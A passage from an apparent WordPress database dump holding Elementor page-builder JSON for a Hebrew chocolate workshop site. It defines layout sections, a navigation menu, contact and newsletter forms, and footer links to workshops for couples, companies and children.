nline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(883,180,'_elementor_version','0.4'),(884,180,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(886,181,'_elementor_template_type','single'),(887,181,'_elementor_edit_mode','builder'),(888,181,'_wp_page_template','default'),(889,181,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(890,181,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"5797de9\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"author\",\"icon\":\"fa fa-user-circle-o\",\"_id\":\"0e28084\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\\u05e0\\u05db\\u05ea\\u05d1 \\u05e2\\\"\\u05d9 \",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"\",\"show_icon\":\"default\"},{\"type\":\"date\",\"icon\":\"fa fa-calendar\",\"_id\":\"b1560e5\",\"date_format\":\"3\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\"},{\"type\":\"time\",\"icon\":\"fa fa-clock-o\",\"_id\":\"2e36932\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"2\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\"}],\"space_between\":{\"unit\":\"px\",\"size\":27},\"icon_align\":\"left\"},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"f3418e3\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8142c60\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 